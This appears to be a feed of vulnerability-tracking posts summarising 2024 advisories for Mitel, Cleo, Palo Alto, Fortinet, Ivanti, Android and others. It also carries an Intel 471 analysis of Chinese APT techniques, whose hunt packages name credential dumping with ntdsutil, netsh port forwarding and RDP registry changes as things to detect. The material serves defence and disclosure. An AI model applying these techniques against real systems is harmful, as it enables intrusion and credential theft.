Detail: Mitel provides a draft Security Advisory 24-000D-001 and assigns CVE-2024-41713 to the Authentication Bypass vulnerability
Date: 26th August 2024
Detail: Arbitrary File Read vulnerability disclosed to Mitel PSIRT
Date: 9th October 2024
Detail: Mitel publish security advisory and patches for the Authentication Bypass vulnerability CVE-2024-41713
Date: 12th October 2024
Detail: Mitel informs watchTowr that a patch will be released for the Arbitrary File Read vulnerability in the first week of December 2024
Date: 4th December 2024
Detail: A hundred days have passed since watchTowr informed Mitel of the Arbitrary File Read without a patch, advisory, or CVE issued
Date: 5th December 2024
Detail: watchTowr publish blog and PoCs

Related vulnerabilities: cve-2024-41713 cve-2024-35286

Cleo Product Security Update - CVE-2024-55956 and CVE-2024-50623

3 months ago by Alexandre Dulaunoy

Cleo Product Security Update - CVE-2024-55956

Patch Version 5.8.0.24 Made Available to Address Previously Reported Critical Vulnerability (CVE-2024-55956) Cleo strongly advises all customers to immediately upgrade instances of Harmony, VLTrader, and LexiCom to the latest released patch (version 5.8.0.24) to address this vulnerability.

The vulnerability affects only the following products:

Cleo Harmony® (prior to version 5.8.0.24)
Cleo VLTrader® (prior to version 5.8.0.24)
Cleo LexiCom® (prior to version 5.8.0.24)

This security patch (version 5.8.0.24) addresses the previously identified critical vulnerability (CVE-2024-55956)) in Cleo Harmony, VLTrader, and LexiCom that could allow an unauthenticated user to import and execute arbitrary bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory.

Please visit Unauthenticated Malicious Hosts Vulnerability to take immediate action..

Cleo Product Security Advisory - CVE-2024-50623

Cleo has identified an unrestricted file upload and download vulnerability (CVE-2024-50623) that could lead to remote code execution.

The vulnerability affects the following products:

Cleo Harmony® (prior to version 5.8.0.21)
Cleo VLTrader® (prior to version 5.8.0.21)
Cleo LexiCom® (prior to version 5.8.0.21)

Cleo strongly advises all customers to immediately upgrade instances of Harmony, VLTrader, and LexiCom to the latest released patch (version 5.8.0.21) to address additional discovered potential attack vectors of the vulnerability. 

Please visit Unrestricted File Upload and Download Vulnerability Mitigation to take immediate action.

Unfortunately some of the links are restricted to customers having a support contact.

CVE-2024-12632 is now rejected and a duplicate of CVE-2024-55956.

Related vulnerabilities: cve-2024-55956 cve-2024-12632 cve-2024-50623

Chinese APT Techniques

3 months ago by Cédric Bonhomme

China’s global ambitions continue to grow, and its military strength, technology research and economic powers are giving it an opportunity to challenge the global order of power — particularly the standing of the U.S. China is expected to soon have the military capabilities to take Taiwan by force. In April 2024, Adm. John Aquilino of the U.S. Indo-Pacific Command cautioned China will be capable of invading Taiwan by 2027. Its building of bases and airstrips on contested reefs in the Spratly Islands near the Philippines continues to cause military tensions. On the technology research side, China has invested an estimated US $15 billion — more than three times that of any other country — in quantum computing and is expected to invest as much as US $1.4 trillion in artificial intelligence (AI) in the next six years. And throughout the world, China uses its economic might — via loans and trade initiatives — to increase its influence in places such as Africa and Pacific Island nations. Fig1

A map of the contested Spratly Islands, a clutch of reefs, shoals and islands in the South China Sea claimed by Brunei, China, Malaysia, Philippines, Taiwan and Vietnam.

Cyber capabilities play a key role in achieving China’s strategic goals, including ensuring partners stay aligned with China and shaping public narratives. This has raised alarms from other governments, which have called for increased vigilance and tightened security. The country’s offensive cyber capabilities have been used for espionage, intellectual property theft and prepositioning of footholds within the critical infrastructure of its adversaries. U.S. intelligence assesses these stealthy malware infections are intended to accomplish disruptive or destructive attacks in the event of a conflict. These campaigns have targeted government and civilian infrastructure at scale. U.S. FBI Director Christopher Wray said China “has a bigger hacking program than every other major nation combined. In fact, if each one of the FBI’s cyber agents and intelligence analysts focused exclusively on the China threat, China’s hackers would still outnumber FBI cyber personnel by at least 50 to 1.”

Espionage traditionally has been shrouded in secrecy, but this is changing. In the past 18 months, governments have disclosed suspected Chinese state-sponsored cyber activities to build public security awareness. The transparency drive correspondingly has driven a change in the advanced persistent threat (APT) landscape. As a result, Chinese state-sponsored cyber threat actors have adapted to global geopolitical developments in 2024 by updating their tactics, techniques and procedures (TTPs) and tool sets to avoid their campaigns being linked to Beijing. Threat actors with a China nexus are emphasizing stealth now more than ever by weaponizing network edge devices, using living off-the-land (LOTL) techniques and setting up operational relay box (ORB) networks.

This post is derived from Intel 471’s Cyber Geopolitical Intelligence, a service that offers insights and analysis of political activity and significant regional events, including China, Iran and Russia, and how those events impact the cyber threat landscape. This post will discuss some of the state sponsored campaigns linked to China and what techniques will likely continue to trend. For more information, please contact Intel 471.

Zero-Day Exploits

Chinese APT groups will move away from traditional initial access methods such as social engineering to exploit zero-day vulnerabilities against network edge devices for mass exploitation. Edge devices and services such as firewalls and virtual private network (VPN) gateways increasingly have become popular targets. These devices are internet facing and provide critical services to remote users, but they also are not easily monitored by network administrators due to the lack of endpoint detection and response (EDR) solutions installed. This provides a “rapid route to privileged local or network credentials on a server with broad access to the internal network” of a target organization, according to research from WithSecure.

Edge-related common vulnerabilities and exposures (CVEs) added to the Known Exploited Vulnerabilities catalog of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) increased from two per month in 2022 to 4.75 in 2024. Conversely, non-edge entries dropped from 5.36 in 2023 to three in 2024. Additionally, an estimated 85% of known zero-days exploited by Chinese nation-state groups since 2021 were against public-facing appliances, which supports a growing trend that attackers are singling out edge devices for mass exploitation.

The Chinese threat group Volt Typhoon aka Vanguard Panda, Bronze Silhouette, Dev-0391, UNC3236, Voltzite, Insidious Taurus discovered in mid-2021 often relies on exploiting zero-day vulnerabilities. The group targets critical infrastructure, such as communications, energy, transport and utilities, including water and wastewater facilities. The group’s “choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence-gathering activities,” according to a U.S. advisory. Volt Typhoon targets public-facing appliances — routers, VPNs and firewalls — in campaigns the U.S. assesses with high confidence are intended to preposition themselves on devices to disrupt them if needed. The U.S. government announced in January 2024 it had disrupted a botnet assembled by Volt Typhoon and used to attack critical infrastructure. The botnet was assembled using the KV malware, which infected hundreds of small office-home office routers (SOHO) — most of which were out of support and no longer receiving security updates.

Several of the largest cyberattacks in 2023 related to vulnerabilities in edge devices or enterprise appliances. On May 23, 2023, Barracuda disclosed CVE-2023-2868, a zero-day vulnerability in its Email Security Gateway (ESG). As early as Oct. 10, 2022, a threat actor group sent emails to potential victims with malicious files intended to exploit ESG. Mandiant identified the group as UNC4841, a cyber espionage group that acts in support of China.

In early 2021, a group known as Silk Typhoon (under Microsoft’s current threat actor naming scheme) exploited a series of zero-day vulnerabilities, including CVE-2021-26855 in the on-premises version of Microsoft’s Exchange email server. The attack could be launched remotely against an Exchange server on port 443. Tens of thousands of Exchange servers were exploited using the vulnerabilities — collectively known as the ProxyLogon flaws — in the days before Microsoft deployed patches.

How does China source these zero-day vulnerabilities? Increasingly, domestically. Chinese security researchers are talented and prolific. Chinese teams in the 2010s saw success at international Capture the Flag and hacking competitions such as DEF CON and Pwn2Own. But in 2017, Beijing started to pressure private sector security researchers to prevent them from sharing knowledge at overseas cybersecurity events. Authoritative Chinese information security experts also asserted that knowledge of undisclosed software vulnerabilities “should remain in China.” In the ensuing years, the Chinese Communist Party (CCP) incorporated the use of security flaws into its national military-civil fusion strategy that aims to acquire foreign intellectual property, key research and high-value information.

China now uses bug-bounty programs, hacking competitions, universities and private entities to collect information on zero-day vulnerabilities in popular software and products. By mandating that security researchers disclose zero-day vulnerabilities to state authorities first, Beijing provides an operational window for nation-state cyber perpetrators to exploit these vulnerabilities for cyber espionage and intelligence gathering. One example of this arrangement played out in 2022. Microsoft reported an Exchange vulnerability tracked as CVE-2021-42321 that was exploited in the wild three days after the security flaw was revealed at the Tianfu Cup, an annual hacking competition held in Chengdu, Sichuan.

Living Off the Land

Rather than develop highly sophisticated custom malware, nation-state groups increasingly will use LOTL techniques to maintain persistence and undetected access on information technology (IT) networks. LOTL techniques use legitimate tools, features and functions available in a target environment to traverse networks and hide within normal network activity, reducing the likelihood of the attacker’s presence being flagged as suspicious. In 2023, the Chinese APT groups Flax Typhoon aka RedJuliett, Ethereal Panda and Volt Typhoon leveraged legitimate tools and utilities that were built into the Windows operating system to target key sectors in the U.S., Taiwan and elsewhere. Some of the tools they used included wmic, ntdsutil, netsh and PowerShell.

In August 2023, the China-linked cyber espionage group BlackTech used LOTL techniques such as NetCat shells and modifying the victim registry to enable remote desktop protocol (RDP). In July 2024, the Chinese-speaking APT group Ghost Emperor resurfaced after an extended period of inactivity with new obfuscation techniques, including the use of living-off-the-land binaries (LOLBins) such as reg.exe and expand.exe within the batch file that initiated the infection chain on the compromised machine to achieve stealth.

Compromised Infrastructure

Chinese ORB networks will continue to develop and mature at pace, reducing APT groups’ dependency on conventional actor-controlled infrastructure. ORB networks are global infrastructures of virtual private servers (VPSs) and compromised smart devices and routers. The extensive networks of proxy devices allow their administrators to scale up and create a “constantly evolving mesh network” to conceal espionage operations. While ORB networks have existed for years, Chinese ORBs in particular have increased in popularity and sophistication in recent years. Each of China’s ORBs is maintained by either private companies or state-sponsored entities and facilitates multiple threat clusters at any given time.

The Mulberry Typhoon aka APT5, Bronze Fleetwood, Keyhole Panda, Manganese, Poisoned Flight, TABCTENG, TEMP.Bottle and Nylon Typhoon aka ke3chang, APT15, Vixen Panda, Nickel groups used the SPACEHOP network to conduct network reconnaissance scanning and exploit vulnerabilities. The Violet Typhoon aka APT31 group and several other actors with a China nexus used the FLORAHOX ORB network to proxy traffic from a source and relay it through a Tor network and numerous compromised router nodes to obfuscate the source of the traffic for cyber espionage attacks.

Assessment

Global geopolitical developments will continue to heavily influence the Chinese APT threat landscape in terms of targeting, tool sets and TTPs. The acceleration of improvements in the cybersecurity posture of numerous key targeted countries has compelled Chinese state-sponsored intelligence forces to become more innovative with their attack strategies.

The use of ORB networks and exploitation of network edge devices emphasize the scalability of their attacks, and all three techniques focus on secrecy. Adopting these techniques would have required a cumulation of upgraded skills, malware and tools that could only be achieved by continuous reconnaissance of target networks and technologies as well as meticulous testing of tools against them over extended periods. Therefore, these changes highly likely reflect a considered, fundamental and permanent shift in Chinese nation-state cyber operations.

In the next six to 12 months, governments and industry regulators worldwide will increase oversight of vital sectors such as energy, public administration, military and defense, technology, manufacturing, telecommunications and media, health care and financial services. Not only will Chinese nation-state threat actors almost certainly continue to pursue these high-value targets, it also is probable they will scale up their operations to conduct global campaigns and target as many entities in each region or sector as possible to maximize their gains at every exploitation.

Hunt Packages

Intel 471 provides threat hunting capabilities for Chinese APT activity through our threat hunting platform HUNTER471. The following is a non-exhaustive list of hunt packages we have created related to the tactics used by Chinese nation-state threat actors.

These pre-written threat hunt queries can be used to query logs stored in security information and event management (SIEM) or EDR systems to detect potential malicious activity. The queries are compatible with a variety of security tools and products, such as CarbonBlack Cloud - Investigate, CarbonBlack Response, CrowdStrike, CrowdStrike LogScale, Elastic, Microsoft Defender, Microsoft Sentinel, Palo Alto Cortex XDR, QRadar Query, SentinelOne, Splunk and Trend Micro Vision One. Register for the Community Edition of HUNTER471, which contains sample hunt packages at no cost. Fig2 A screenshot of hunt packages available in HUNTER471 related to finding behaviors associated with the threat actor group Volt Typhoon.

WMIC Windows Internal Discovery and Enumeration

This package will identify the potential malicious use of Windows Management Interface (WMI) for local enumeration and discovery of a host.

Obfuscated PowerShell Execution String - Potential Malware Execution

Many adversaries use obfuscated commands involving different techniques to implement and use Base64 strings. This package identifies popular characteristics deployed by many actors utilizing this technique.

Enabling Remote Desktop Protocol (RDP) - Possible SmokedHam Activity (Commandline Arguments)

This content is designed to detect when command-line arguments are executed to modify the registry key that enables or disables RDP capabilities (HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server OR HKLM\SYSTEM\ControlSet00*\Control\Terminal Server). False positives may occur depending on the environment per company, as these registry keys can be modified by admins.

Dump Active Directory Database with NTDSUtil - Potential Credential Dumping

This content is designed to identify when NTDSutil.exe is used to create a full backup of Active Directory.

Netsh Port Forwarding Command

This use case is meant to identify the netsh port forwarding command-line parameters "interface portproxy add."

Restricted Admin Mode Login - Possible Lateral Movement

This hunt package is meant to capture the surrounding activity when a user successfully logs in (Event Code 4624) using RDP with restricted admin mode enabled.

Related vulnerabilities: cve-2023-2868 cve-2021-26855 cve-2021-42321

Zabbix

3 months ago by Alexandre Dulaunoy

cve-2024-22116 9.9 (v3.1) Remote code execution within ping script Zabbix
cve-2024-36466 8.8 (v3.1) Unauthenticated Zabbix frontend takeover when SSO is b… Zabbix
cve-2024-36467 7.5 (v3.1) Authentication privilege escalation via user groups du… Zabbix
cve-2024-42330 9.1 (v3.1) JS - Internal strings in HTTP headers Zabbix
cve-2024-42327 9.9 (v3.1) SQL injection in user.get API Zabbix

Researchers have discovered vulnerabilities in the update process of Palo Alto Networks (CVE-2024-5921) and SonicWall (CVE-2024-29014)

3 months ago by Alexandre Dulaunoy

CVE-2024-5921

CVE-2024-5921 affects various versions of Palo Alto’s GlobalProtect App on Windows, macOS and Linux, and stems from insufficient certification validation.

It enables attackers to connect the GlobalProtect app to arbitrary servers, the company confirmed, and noted that this may result in attackers installing malicious root certificates on the endpoint and subsequently installing malicious software signed by these certificates.

“Both the Windows and macOS versions of the GlobalProtect VPN client are vulnerable to remote code execution (RCE) and privilege escalation via the automatic update mechanism. While the update process requires MSI files to be signed, attackers can exploit the PanGPS service to install a maliciously trusted root certificate, enabling RCE and privilege escalation. The updates are executed with the privilege level of the service component (SYSTEM on Windows and root on macOS),” AmberWolf researchers Richard Warren and David Cash explained.

“By default, users can specify arbitrary endpoints in the VPN client’s UI component (PanGPA). This behaviour can be exploited in social engineering attacks, where attackers trick users into connecting to rogue VPN servers. These servers can capture login credentials and compromise systems through malicious client updates.”

“This issue is fixed in GlobalProtect app 6.2.6 and all later GlobalProtect app 6.2 versions on Windows,” Palo Alto says. The company has also introduced an additional configuration parameter (FULLCHAINCERTVERIFY) that should be enabled to enforce stricter certificate validation against the system’s trusted certificate store.

There are currently no fixes for macOS or Linux versions of the app, according to PAN’s security advisory.

There is a workaround/mitigation available, though, and it consists of enabling FIPS-CC modefor the GlobalProtect app on the endpoints (and enabling FIPS-CC mode on the GlobalProtect portal/gateway).

AmberWolf researchers say that host-based firewall rules can also be implemented to prevent users connecting to malicious VPN servers.

CVE-2024-29014

CVE-2024-29014 affects SonicWall’s NetExtender VPN client for Windows versions 10.2.339 and earlier, and allows attackers to execute code with SYSTEM privileges when an End Point Control (EPC) Client update is processed. The vulnerability stems from insufficient signature validation.

There are several exploitation scenarios that could lead to this. For example, a user can be tricked into connecting their NetExtender client to a malicious VPN server and install a fake (malicious) EPC Client update.

“When the SMA Connect Agent is installed, attackers can exploit a custom URI handler to force the NetExtender client to connect to their server. Users only need to visit a malicious website and accept a browser prompt, or open a malicious document for the attack to succeed,” AmberWolf researchers explained another approach.

SonicWall has patched the vulnerability earlier this year in NetExtender Windows (32 and 64 bit) 10.2.341 and later versions, and urged users to upgrade.

“If an immediate upgrade is not feasible, consider using a client firewall to restrict access to known, legitimate VPN endpoints to prevent users from inadvertently connecting to malicious servers,” AmberWolf advised.

Related vulnerabilities: cve-2024-5921 cve-2024-29014

Keycloak release 26.0.6 includes fixes for five vulnerabilities

4 months ago by Alexandre Dulaunoy

Keycloak release 26.0.6 includes fixes for five vulnerabilities

GitHub Issue #35213 CVE-2024-10451 Sensitive Data Exposure in Keycloak Build Process
GitHub Issue #35214 CVE-2024-10270 Potential Denial of Service
GitHub Issue #35215 CVE-2024-10492 Keycloak path trasversal
GitHub Issue #35216 CVE-2024-9666 Keycloak proxy header handling Denial-of-Service (DoS) vulnerability
GitHub Issue #35217 CVE-2024-10039 Bypassing mTLS validation
For more details: https://github.com/keycloak/keycloak/releases/tag/26.0.6

Related vulnerabilities: cve-2024-9666 cve-2024-10039 cve-2024-10492 cve-2024-10270 cve-2024-10451

Apple Fixes Two Exploited Vulnerabilities on Intel-based Mac Systems

4 months ago by Alexandre Dulaunoy

Apple Fixes Two Exploited Vulnerabilities on Intel-based Mac Systems

CVE-2024-44308 - The issue was addressed with improved checks. This issue is fixed in Safari 18.1.1, iOS 17.7.2 and iPadOS 17.7.2, macOS Sequoia 15.1.1, iOS 18.1.1 and iPadOS 18.1.1, visionOS 2.1.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 - A cookie management issue was addressed with improved state management. This issue is fixed in Safari 18.1.1, iOS 17.7.2 and iPadOS 17.7.2, macOS Sequoia 15.1.1, iOS 18.1.1 and iPadOS 18.1.1, visionOS 2.1.1. Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.

Vulnerabilities discovered by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group

Related vulnerabilities: cve-2024-44308 cve-2024-44309

Palo Alto (confusion?) - Privilege Escalation (PE) Vulnerability in the Web Management Interface versus : Authentication Bypass in the Management Web Interface

4 months ago by Alexandre Dulaunoy

Based on Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 , This is a pair of bugs, described as ‘Authentication Bypass in the Management Web Interface’ and a ‘Privilege Escalation‘ respectively, strongly suggesting they are used as a chain to gain superuser access, a pattern that we’ve seen before with Palo Alto appliances. Before we’ve even dived into to code, we’ve already ascertained that we’re looking for a chain of vulnerabilities to achieve that coveted pre-authenticated Remote Code Execution..

The following CVEs were assigned:

CVE-2024-9474 - A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. Cloud NGFW and Prisma Access are not impacted by this vulnerability.
CVE-2024-0012 - An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 . The risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software. Cloud NGFW and Prisma Access are not impacted by this vulnerability.

Related vulnerabilities: cve-2024-0012 cve-2024-9474

Fortinet - November 12 2024 - advisories

4 months ago by Alexandre Dulaunoy

FG-IR-24-115 Arbitrary file read in administrative interface CVE-2024-32117

An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability [CWE-22]…

FortiAnalyzer 7.4.2, 7.4.1, 7.4.0, 7.2.5, 7.2.4 … FortiAnalyzer-BigData 7.4.0, 7.2.7, 7.2.6, 7.2.5, 7.2.4 … FortiManager 7.4.2, 7.4.1, 7.4.0, 7.2.5, 7.2.4 …

Published: Nov 12, 2024

GUI

Medium Severity

FG-IR-24-032 FortiOS - Improper authentication in fgfmd CVE-2024-26011

An improper authentication vulnerability [CWE-287] in FortiManager, FortiOS, FortiPAM, FortiPortal,…

FortiManager 7.4.2, 7.4.1, 7.4.0, 7.2.4, 7.2.3 … FortiOS 7.4.3, 7.4.2, 7.4.1, 7.4.0, 7.2.7 … FortiPAM 1.2.0, 1.1.2, 1.1.1, 1.1.0, 1.0.3 … FortiPortal 6.0.14, 6.0.13, 6.0.12, 6.0.11, 6.0.10 … FortiProxy 7.4.2, 7.4.1, 7.4.0, 7.2.9, 7.2.8 … FortiSwitchManager 7.2.3, 7.2.2, 7.2.1, 7.2.0, 7.0.3 …

Published: Nov 12, 2024

Medium Severity

FG-IR-23-475 FortiOS - SSLVPN session hijacking using SAML authentication CVE-2023-50176

A session fixation vulnerability [CWE-384] in FortiOS may allow an unauthenticated attacker to hijack user…

FortiOS 7.4.3, 7.4.2, 7.4.1, 7.4.0, 7.2.7 …

Published: Nov 12, 2024

SSL-VPN

High Severity

FG-IR-24-125 Heap buffer overflow in httpd CVE-2024-33505

A heap-based buffer overflow vulnerability [CWE-122] in FortiManager and FortiAnalyzer httpd daemon may…

FortiAnalyzer 7.4.2, 7.4.1, 7.4.0, 7.2.5, 7.2.4 … FortiAnalyzer Cloud 7.4.2, 7.4.1, 7.2.6, 7.2.5, 7.2.4 … FortiManager 7.4.2, 7.4.1, 7.4.0, 7.2.5, 7.2.4 … FortiManager Cloud 7.4.2, 7.4.1, 7.2.6, 7.2.5, 7.2.4 …

Published: Nov 12, 2024

GUI

Medium Severity

FG-IR-23-267 Lack of capacity to filter logs by administrator access CVE-2023-44255

An Exposure of personal information to an unauthorized actor [CWE-359] in FortiManager, FortiAnalyzer &…

FortiAnalyzer 7.4.2, 7.4.1, 7.4.0, 7.2.8, 7.2.7 … FortiAnalyzer-BigData 7.4.0, 7.2.8, 7.2.7, 7.2.6, 7.2.5 … FortiManager 7.4.2, 7.4.1, 7.4.0, 7.2.8, 7.2.7 …

Published: Nov 12, 2024

GUI

Low Severity

FG-IR-24-116 OS command injection in CLI command CVE-2024-32118

An improper neutralization of special elements used in an OS command ('OS Command Injection')…

FortiAnalyzer 7.4.2, 7.4.1, 7.4.0, 7.2.5, 7.2.4 … FortiAnalyzer-BigData 7.4.0, 7.2.7, 7.2.6, 7.2.5, 7.2.4 … FortiManager 7.4.2, 7.4.1, 7.4.0, 7.2.5, 7.2.4 …

Published: Nov 12, 2024

CLI

Medium Severity

FG-IR-24-099 Path traversal vulnerability in CLI commands CVE-2024-32116

Multiple relative path traversal vulnerabilities [CWE-23] in FortiManager, FortiAnalyzer &…

FortiAnalyzer 7.4.2, 7.4.1, 7.4.0, 7.2.5, 7.2.4 … FortiAnalyzer-BigData 7.4.0, 7.2.7, 7.2.6, 7.2.5, 7.2.4 … FortiManager 7.4.2, 7.4.1, 7.4.0, 7.2.5, 7.2.4 …

Published: Nov 12, 2024

CLI

Medium Severity

FG-IR-24-179 Path traversal vulnerability leading to file creation CVE-2024-35274

An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability [CWE-22]…

FortiAnalyzer 7.4.2, 7.4.1, 7.4.0, 7.2.8, 7.2.7 … FortiAnalyzer-BigData 7.4.0, 7.2.8, 7.2.7, 7.2.6, 7.2.5 … FortiManager 7.4.2, 7.4.1, 7.4.0, 7.2.8, 7.2.7 …

Published: Nov 12, 2024

CLI

Low Severity

FG-IR-23-396 Readonly users could run some sensitive operations CVE-2024-23666

A client-side enforcement of server-side security vulnerability [CWE-602] in FortiAnalyzer may allow an…

FortiAnalyzer 7.4.1, 7.4.0, 7.2.4, 7.2.3, 7.2.2 … FortiAnalyzer-BigData 7.4.0, 7.2.6, 7.2.5, 7.2.4, 7.2.3 … FortiManager 7.4.1, 7.4.0, 7.2.4, 7.2.3, 7.2.2 …

Published: Nov 12, 2024

High Severity

FG-IR-24-033 SSLVPN WEB UI Text injection CVE-2024-33510

An improper neutralization of special elements in output used by a downstream component ('Injection')…

FortiOS 7.4.3, 7.4.2, 7.4.1, 7.4.0, 7.2.8 … FortiProxy 7.4.3, 7.4.2, 7.4.1, 7.4.0, 7.2.9 …

Published: Nov 12, 2024

GUI

Low Severity

FG-IR-24-098 Stack buffer overflow in CLI command CVE-2024-31496

A stack-based buffer overflow vulnerability [CWE-121] in FortiManager, FortiAnalyzer and…

FortiAnalyzer 7.4.2, 7.4.1, 7.4.0, 7.2.5, 7.2.4 … FortiAnalyzer-BigData 7.4.0, 7.2.7, 7.2.6, 7.2.5, 7.2.4 … FortiManager 7.4.2, 7.4.1, 7.4.0, 7.2.5, 7.2.4 …

Published: Nov 12, 2024

Ivanti Security Advisory EPM November 2024 for EPM 2024 and EPM 2022 SU6

4 months ago by Alexandre Dulaunoy

Ivanti has released updates for Ivanti Endpoint Manager which addresses high and critical severity vulnerabilities.

Ivanti is not aware of any customers being exploited by these vulnerabilities at the time of disclosure.

Security Advisory EPM November 2024 for EPM 2024 and EPM 2022 SU6

Primary Product

Endpoint Manager

Created Date

12 Nov 2024 15:00:14

Last Modified Date

12 Nov 2024 21:33:24

Summary

Ivanti has released updates for Ivanti Endpoint Manager which addresses high and critical severity vulnerabilities.

We are not aware of any customers being exploited by these vulnerabilities at the time of disclosure.

Vulnerability Details:

CVE Number

Description

CVSS Score (Severity)

CVSS Vector

CWE

CVE-2024-34787

Path traversal in Ivanti Endpoint Manager before 2024 November Security Update or 2022 SU6 November Security Update allows a local unauthenticated attacker to achieve code execution. User interaction is required.

7.8 (High)

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE-22

CVE-2024-50322

7.8 (High)

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE-22

CVE-2024-32839

SQL injection in Ivanti Endpoint Manager before 2024 November Security Update or 2022 SU6 November Security Update allows a remote authenticated attacker with admin privileges to achieve remote code execution.

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-32841

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-32844

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-32847

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-34780

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-37376

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-34781

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-34782

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-34784

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-50323

SQL injection in Ivanti Endpoint Manager before 2024 November Security Update or 2022 SU6 November Security Update allows a local unauthenticated attacker to achieve code execution. User interaction is required.

7.8 (High)

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-50324

Path traversal in Ivanti Endpoint Manager before 2024 November Security Update or 2022 SU6 November Security Update allows a remote authenticated attacker with admin privileges to achieve remote code execution.

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-22

CVE-2024-50326

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-50327

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-50328

7.2 (High)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE-89

CVE-2024-50329

Path traversal in Ivanti Endpoint Manager before 2024 November Security Update or 2022 SU6 November Security Update allows a remote unauthenticated attacker to achieve remote code execution. User interaction is required.

8.8 (High)

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE-22

CVE-2024-50330

SQL injection in Ivanti Endpoint Manager before 2024 November Security Update or 2022 SU6 November Security Update allows a remote unauthenticated attacker to achieve remote code execution.

9.8 (Critical)

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-89

Affected Versions

Product Name

Affected Version(s)

Resolved Version(s)

Patch Availability

Ivanti Endpoint Manager (EPM)

2024 September security update and prior,
2022 SU6 September security update and prior

2024 November Security Update, 2022 SU6 November Security Update

MoveIT vulnerabilities exploited

4 months ago by Alexandre Dulaunoy

Exploit Attempts Recorded Against New MOVEit Transfer Vulnerability - Patch ASAP! - June 2024 - CVE-2024-5806 and CVE-2024-5805
Third Flaw Uncovered in MOVEit Transfer App Amidst Cl0p Ransomware Mass Attack - Jun 16, 2023 - CVE-2023-35708
Amazon confirms employee data breach after vendor hack - November 11, 2024 - Most probably CVE-2023-35708

Related vulnerabilities: cve-2024-5805 cve-2024-5806 cve-2023-35708

Android Security Bulletin November 2024

4 months ago by Alexandre Dulaunoy

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2024-11-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

The most severe of these issues is a high security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

Note: There are indications that the following may be under limited, targeted exploitation.

CVE-2024-43047
CVE-2024-43093

2024-11-01 security patch level vulnerability details

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2024-11-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates. Framework

